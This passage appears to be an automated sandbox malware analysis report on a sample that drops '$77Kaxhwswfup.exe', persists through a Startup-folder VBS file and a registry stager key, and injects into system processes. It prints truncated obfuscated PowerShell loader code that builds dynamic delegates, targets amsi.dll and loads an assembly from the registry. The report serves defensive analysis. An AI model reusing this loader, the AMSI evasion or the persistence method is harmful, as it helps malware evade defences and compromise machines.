                      Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: vm6XYZzWOd.exe, 00000000.00000002.2336961544.0000000007780000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006BAD000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2765221836.0000000004770000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003890000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000011.00000002.3565608470.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381021025.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: ~1.PDB @ source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000011.00000002.3565608470.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381021025.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000011.00000002.3565608470.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381021025.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($MqmAuoaRJIuKTQ,$IWmJQjKZijMLKdIaBfm).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+''+'l'+''+'l'+'');$woXAbHxooZFxzUvIS=$orrkynlqKpbkhN.Invoke($Null
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('$'+[Char](55)+'7s'+'t'+'a'+[Char]
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UKPEWRGEIPej{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$diFffPduGehihq,[Parameter(Position=1)][Type]$PCksoXTjIn)$dnnozXtGtCr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+'s'+''+','+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+'S'+'e'+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dnnozXtGtCr.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$diFffPduGehihq).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$dnnozXtGtCr.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PCksoXTjIn,$diFffPduGehihq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $dnnozXtGtCr.CreateType();}$lVayyyANUYcKS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UKPEWRGEIPej{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$diFffPduGehihq,[Parameter(Position=1)][Type]$PCksoXTjIn)$dnnozXtGtCr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+'s'+''+','+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+'S'+'e'+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dnnozXtGtCr.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$diFffPduGehihq).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$dnnozXtGtCr.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PCksoXTjIn,$diFffPduGehihq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $dnnozXtGtCr.CreateType();}$lVayyyANUYcKS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'
                      Source: Yara matchFile source: 21.2.$77Kaxhwswfup.exe.5e0cba8.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.$77Kaxhwswfup.exe.46d04d0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.3a3eeb4.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.7550000.18.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.6887968.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.68af988.15.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.$77Kaxhwswfup.exe.47704f0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.6887968.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.699f9c8.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.68af988.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.68ff9a8.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.$77Kaxhwswfup.exe.46804b0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.3a3eeb4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2335244662.0000000007550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2765221836.0000000004770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2746243713.0000000003591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2765221836.0000000004591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2314321944.0000000006431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2778996025.0000000005DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vm6XYZzWOd.exe PID: 6772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: $77Kaxhwswfup.exe PID: 7056, type: MEMORYSTR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F1B05C push esp; retf 4_2_00007FF848F1B05D
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FE1CC1 push ecx; ret 6_2_00FE1CD4
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_3_000001B094BBB09D push rcx; retf 003Fh7_3_000001B094BBB09E
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_3_000001E85896B09D push rcx; retf 003Fh8_3_000001E85896B09E
                      Source: C:\Windows\System32\lsass.exeCode function: 9_3_00000140ADFDB09D push rcx; retf 003Fh9_3_00000140ADFDB09E
                      Source: C:\Windows\System32\svchost.exeCode function: 10_3_00000195DD5AB09D push rcx; retf 003Fh10_3_00000195DD5AB09E
                      Source: C:\Windows\System32\dwm.exeCode function: 11_3_000001160CA4B09D push rcx; retf 003Fh11_3_000001160CA4B09E
                      Source: C:\Windows\System32\svchost.exeCode function: 12_3_00000257E108B09D push rcx; retf 003Fh12_3_00000257E108B09E
                      Source: C:\Windows\System32\svchost.exeCode function: 13_3_000001F28C1EB09D push rcx; retf 003Fh13_3_000001F28C1EB09E
                      Source: C:\Windows\System32\svchost.exeCode function: 14_3_000001CA97FEB09D push rcx; retf 003Fh14_3_000001CA97FEB09E
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001D2652FB09D push rcx; retf 003Fh15_3_000001D2652FB09E
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00000254A27DB09D push rcx; retf 003Fh16_3_00000254A27DB09E
                      Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000024B87DBB09D push rcx; retf 003Fh17_3_0000024B87DBB09E
                      Source: C:\Windows\System32\svchost.exeCode function: 18_3_00000205FB3DB09D push rcx; retf 003Fh18_3_00000205FB3DB09E
                      Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001A20568B09D push rcx; retf 003Fh19_3_000001A20568B09E
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeFile created: C:\Users\user\AppData\Local\Temp\$778e373eJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeFile created: C:\Users\user\AppData\Local\Temp\$77eec42dJump to dropped file
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeFile created: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeJump to dropped file
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeFile created: C:\Users\user\AppData\Local\Temp\$77a3a3b4Jump to dropped file
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeFile created: C:\Users\user\AppData\Local\Temp\$778e373eJump to dropped file
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeFile created: C:\Users\user\AppData\Local\Temp\$77a3a3b4Jump to dropped file
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeFile created: C:\Users\user\AppData\Local\Temp\$77eec42dJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbsJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $77stagerJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
